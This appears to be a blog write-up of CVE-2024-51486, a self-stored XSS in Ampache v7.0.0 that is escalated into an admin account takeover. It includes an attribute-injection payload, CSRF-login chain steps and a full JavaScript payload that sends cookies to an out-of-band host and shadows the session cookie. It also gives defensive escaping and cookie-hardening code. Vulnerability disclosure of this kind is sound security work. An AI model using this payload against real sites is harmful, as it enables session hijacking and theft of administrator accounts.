CVE-2024-51486 | Ampache v7.0.0 XSS | Admin Account Compromise

Hacking Notes
Nov 1, 2024

Introduction to CVE-2024-51486

CVE-2024-51486 identifies a critical security vulnerability in Ampache v7.0.0 that threatens user data and system integrity. This self-stored XSS (Cross-Site Scripting) flaw lets an attacker execute JavaScript in a user’s browser, leading to unauthorized actions and potential account takeover. The risk is amplified because this self-stored XSS can be escalated into a stored XSS that fires in another user’s session.

What is Ampache

Ampache is an advanced web-based media streaming application designed to manage and play audio and video files online. It empowers users to organize, access, and stream their media collections from anywhere, making it a versatile tool for music and video enthusiasts.

The platform features a user-friendly interface that allows users to easily upload and manage their media without requiring extensive technical skills, making it accessible to a wide audience. Additionally, Ampache supports multiple platforms, enabling users to stream their media on various devices, including computers, smartphones, and tablets, which significantly enhances accessibility.

One of Ampache’s standout features is its ability to stream high-quality audio and video in real time, ensuring an enjoyable user experience. It also offers integration with various tools and services, providing flexibility in how users can manage and play their media. As an open-source project, Ampache allows users to customize the software to meet their specific needs, further increasing its utility.

Developed by a dedicated community of contributors, Ampache has grown into a robust platform that continues to evolve. Its extensive capabilities and ongoing development are a testament to the commitment of its community, making it a remarkable achievement in the realm of media streaming solutions.

Exploitation Phase

Now that you clearly understand what Ampache is, let’s delve deeper into the specifics of this CVE and explore how an attacker might exploit it. We will begin by demonstrating a straightforward vulnerability and then illustrate a relevant use case in which an attacker could leverage this vulnerability against an administrator to gain elevated privileges.

Simple Exploitation

To exploit the self-stored XSS vulnerability in the interface section, you first need an account with catalog manager access. Once logged in, enter the following payload in the “Custom URL - Favicon” field: xss" onfocus="alert(1)" autofocus tabindex="1". When the favicon is rendered, the injected attributes trigger an alert, demonstrating the presence of the vulnerability.

A recommendation for addressing this issue is to implement input sanitization: validating every user-supplied value and removing or neutralizing characters that could break out of the surrounding HTML before the application stores or renders it.
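The favicon setting ends up inside an HTML attribute, so the practical fix is to validate the value as a URL and encode it for the attribute context at render time. The example below is added here and is not Ampache’s code: renderFaviconUnsafe reproduces the bug class with the payload from this write-up, and renderFaviconSafe shows the hardened form (function names, the default favicon path and the allowed schemes are assumptions).

```javascript
// Added example, not Ampache's own code. The "Custom URL - Favicon" setting is
// rendered into a <link> attribute; the payload from the write-up is used only
// as test input to show the difference between the two renderers.
const XSS_PAYLOAD = 'xss" onfocus="alert(1)" autofocus tabindex="1"';

// Unsafe: the user value is concatenated straight into a quoted attribute, so a
// double quote in the value closes href and the rest becomes new attributes.
function renderFaviconUnsafe(customUrl) {
  return `<link rel="icon" href="${customUrl}">`;
}

// Encode the characters that can terminate a quoted attribute or start a tag.
function escapeAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Accept only absolute http(s) URLs or site-relative paths; anything else
// (no scheme, javascript:, data:, protocol-relative //host) is rejected.
function validateFaviconUrl(customUrl) {
  const value = String(customUrl ?? '').trim();
  if (value === '') return null;
  if (value.startsWith('/') && !value.startsWith('//')) return value;
  let parsed;
  try {
    parsed = new URL(value); // throws on values without a valid scheme
  } catch {
    return null;
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  return parsed.href;
}

// Hardened: validate first, then encode for the attribute context, and fall
// back to the built-in favicon (assumed path) when the value is rejected.
const DEFAULT_FAVICON = '/favicon.ico';
function renderFaviconSafe(customUrl) {
  const url = validateFaviconUrl(customUrl) ?? DEFAULT_FAVICON;
  return `<link rel="icon" href="${escapeAttr(url)}">`;
}
```

Validation alone is not enough: a perfectly valid URL can still contain & or a quote, which is why the safe renderer always encodes after validating.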

Attacker Scenario Exploiting the Vulnerability

To amplify the impact of this vulnerability, the self-stored XSS can be turned into a standard stored XSS by chaining it with a CSRF login. In the following video, I walk you through the steps I took to escalate a similar vulnerability for greater effect.

The following video demonstrates the exploitation process for CVE#1; the same principles apply here, with one key difference: the required access level. This vulnerability needs catalog manager access, whereas CVE#1 requires only standard user access.

In summary, here are the steps we took to convert this self-stored XSS into a standard stored XSS.

1. CSRF Login:
  • The attacker creates a malicious link hosted on https://xss.expert.com/ampache. When the victim clicks this link, it triggers a CSRF request that logs the admin into the attacker’s account on ampachev7.hacking-poc.com.

2. Self-XSS Payload Injection:
  • A self-XSS payload is executed, performing the following actions:
    - Captures the attacker’s cookies.
    - Saves the cookies to local storage.
    - Clears all cookies, logging out the admin upon page refresh.
    - Sets the attacker’s cookie with the specific path /index.php, which takes precedence over others due to its specificity.
    - When the admin logs back in and visits /index.php, the application will use the attacker’s cookies for the session.

3. Redirection to Login:
  • The admin is redirected to /login.php to re-authenticate.

4. Accessing /index.php:
  • Upon logging in, the admin accesses /index.php while still having the attacker’s cookies.
  • The self-XSS script exfiltrates all cookies (both the attacker’s and the admin’s).

This series of vulnerabilities allows you to escalate the self-stored XSS into a full-fledged stored XSS.

To clarify, here is the self-XSS JavaScript. It runs both when the admin is logged into the attacker’s account and again when the admin is logged in but the session is carried by the attacker’s cookie.

const interactsh = 'x123.oast.fun';

// Step 1: send every cookie visible to JavaScript to the out-of-band host.
const cookieData = encodeURIComponent(document.cookie);
const img = new Image();
img.src = `https://${interactsh}/?cookie=${cookieData}`;

const getCookieValue = (cookieName) => {
  const cookie = document.cookie.split('; ').find(row => row.startsWith(`${cookieName}=`));
  return cookie ? cookie.split('=')[1] : null;
};

// Step 2: back up the current (attacker) session cookies in local storage.
const ampacheCookieValue = getCookieValue('ampache');
const ampacheUserCookieValue = getCookieValue('ampache_user');
if (ampacheCookieValue) {
  localStorage.setItem('ampacheBackup', ampacheCookieValue);
}
if (ampacheUserCookieValue) {
  localStorage.setItem('ampacheUserBackup', ampacheUserCookieValue);
}

const savedAmpacheValue = localStorage.getItem('ampacheBackup');
const savedAmpacheUserValue = localStorage.getItem('ampacheUserBackup');

// Step 3: only while logged in as the attacker account, clear all cookies,
// re-set the attacker's session cookie scoped to /index.php and send the
// admin to the login page.
if (savedAmpacheUserValue === 'user') {
  document.cookie = 'ampache=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; domain=ampachev7.hacking-poc.com';
  document.cookie = 'ampache_lang=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; domain=ampachev7.hacking-poc.com';
  document.cookie = 'ampache_user=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; domain=ampachev7.hacking-poc.com';
  document.cookie = 'PHPSESSID=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; domain=ampachev7.hacking-poc.com';
  document.cookie = 'ampache=' + ampacheCookieValue + ';path=/index.php';
  window.location.href = 'https://ampachev7.hacking-poc.com/login.php';
}
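The script above depends on two server-side conditions: the session cookies are readable from document.cookie, and a second ampache cookie scoped to /index.php is accepted ahead of the real one. The following defensive example is added here and is not Ampache’s code: a Cookie-header parser that flags duplicate session-cookie names (the signature of the path-shadowing step) and a Set-Cookie builder with the flags that close the exfiltration route. Cookie names are taken from the payload above; the function names and the Node-style request handling are assumptions.

```javascript
// Added defensive example, not Ampache's own code. Cookie names come from the
// payload in the write-up; everything else here is assumed.
const SESSION_COOKIES = ['ampache', 'ampache_user', 'PHPSESSID'];

// Parse a raw Cookie header into name -> [values], keeping duplicates. A
// browser sends a cookie scoped to a longer path (e.g. /index.php) before a
// cookie of the same name scoped to /, so a shadowed session cookie arrives
// as two values for one name instead of silently replacing the real one.
function parseCookieHeader(header) {
  const out = new Map();
  for (const part of String(header ?? '').split(';')) {
    const idx = part.indexOf('=');
    if (idx < 0) continue;
    const name = part.slice(0, idx).trim();
    const value = part.slice(idx + 1).trim();
    if (!name) continue;
    if (!out.has(name)) out.set(name, []);
    out.get(name).push(value);
  }
  return out;
}

// Names of session cookies that appear more than once in the request. A
// non-empty result is a reason to reject the request and clear the session
// rather than resolve to whichever value the browser listed first.
function shadowedSessionCookies(header) {
  const cookies = parseCookieHeader(header);
  return SESSION_COOKIES.filter((n) => (cookies.get(n) ?? []).length > 1);
}

// Set-Cookie value for a session cookie. HttpOnly keeps it out of
// document.cookie (the exfiltration step above), Secure and SameSite=Lax limit
// where the browser sends it, and a single root Path keeps the application's
// own cookies from ever being split across paths.
function sessionSetCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed request header reproducing the shadowing step: the attacker's
// /index.php-scoped cookie is listed before the admin's root-scoped one.
const SAMPLE_HEADER = 'ampache=ATTACKER_SESSION; ampache=ADMIN_SESSION; ampache_user=admin';
```

Regenerating the session identifier on every successful login is the usual companion to these flags; it is not shown here because the page does not describe Ampache’s login handling.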

Other References

For the latest updates on my developments and research, be sure to check out my GitHub profile.
